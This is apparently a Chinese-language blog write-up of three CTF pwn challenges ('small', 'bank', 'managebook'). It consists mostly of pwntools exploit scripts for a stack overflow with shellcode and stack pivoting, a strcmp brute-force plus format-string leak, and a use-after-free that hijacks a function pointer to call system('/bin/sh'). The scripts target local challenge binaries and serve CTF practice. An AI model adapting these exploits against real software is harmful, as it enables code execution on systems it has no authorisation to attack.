第六届网络空间安全技术赛pwn

发表于 更新于 阅读次数:

比赛没参加,本篇纯属因为无聊才写的(一个多月没做pwn了,顺便复习一下exp咋写…)

题目

small

应该是签到题吧
checksec一看,保护全没开,极有可能
20210508154649
向大小为0x10的栈read 0x400个字节,很直接的想法就是输入shellcode然后跳转执行
再一看下方有一个大小为0x50的bss段,exp差不多就能出来了

1
2
3
4
5
6
7
8
9
10
11
12
from pwn import *
context(arch="amd64",os='linux',log_level='debug')
p=process("./small")

payload1 = "A"*0x10 + p64(0x402020) + p64(0x401015)
p.sendline(payload1)
shellcode = asm(shellcraft.sh())
#gdb.attach(p)
#pause()
payload2 = "a"*0x10 + p64(0x402020) + p64(0x402030) + shellcode
p.sendline(payload2)
p.interactive()

上学期西电新生赛的栈迁移都比这个灵活

bank

checksec:
20210508195950
拖到ida里:
20210508202927
20210508202941
先判断输入的password,然后printf存在很明显的格式化字符串漏洞,用于打印flag

其中格式化字符串的漏洞只需要能够读栈上的值即可,这题的有意思的点在于爆破绕过strcmp
20210508212659
20210508212648
注:fgets读取到“\n”时结束

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
from pwn import *
context(arch="amd64",os='linux',log_level='debug')
i=0
while(1):
	i+=1
    p=process("./bank")
	p.sendlineafter("Please enter your account:\n","a")
	p.sendlineafter("Please enter your password:\n","")
	if 'wrong' in p.recvline():
		p.close()
		continue
    print(i)
	sleep(1)
	p.sendline("yes")
	#p.sendlineafter("Do you want to check your account balance?\n","yes")
	p.sendlineafter("Please input your private code: \n","%8$s")

18年网鼎杯有个跟/dev/urandom有关的题目,https://bbs.pediy.com/thread-246590.htm,蛮有意思的,linux默认单个进程打开的最大文件数为1024

managebook

常规的uaf,类似经典的hacknote

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
from pwn import *
context(arch="amd64",os='linux')

p = process("./managebooks")
elf = ELF("./managebooks")

def create(name_size,name,summary_size,summary):
	p.recv()
	p.sendline("1")
	p.sendlineafter("Enter book name size: ",str(name_size))
	p.sendlineafter("Enter book name: ",name)
	p.sendlineafter("Enter book summary size: ",str(summary_size))
	p.sendlineafter("Enter book summary: ",summary)
	
def delete(num):
	p.recv()
	p.sendline("2")
	p.sendline(str(num))

def change(num,size,summary):
	p.recv()
	p.sendline("3")
	p.sendlineafter("Select Book ID (0-10): ",str(num))
	p.sendlineafter("Enter book summary size: ",str(size))
	p.sendlineafter("Enter book summary: ",summary)

def read(num):
	p.recv()
	p.sendline("4")
	p.sendlineafter("Select Book ID (0-10): ",str(num))

puts_plt = elf.plt["puts"]
puts_got = elf.got['puts']

create(0x20,"aaaa",0x20,"AAAA")
create(0x20,"bbbb",0x20,"BBBB")

delete(0)

change(1,0x18,p64(puts_plt)+p64(0)+p64(puts_got))
#gdb.attach(p)
read(0)

puts_addr= u64(p.recvline()[:-1].ljust(8,'\x00'))
print hex(puts_addr)

sys = puts_addr - 0x2a300
binsh = puts_addr + 0x11d777

change(1,0x18,p64(sys) + p64(0) + p64(binsh))

read(0)
p.interactive()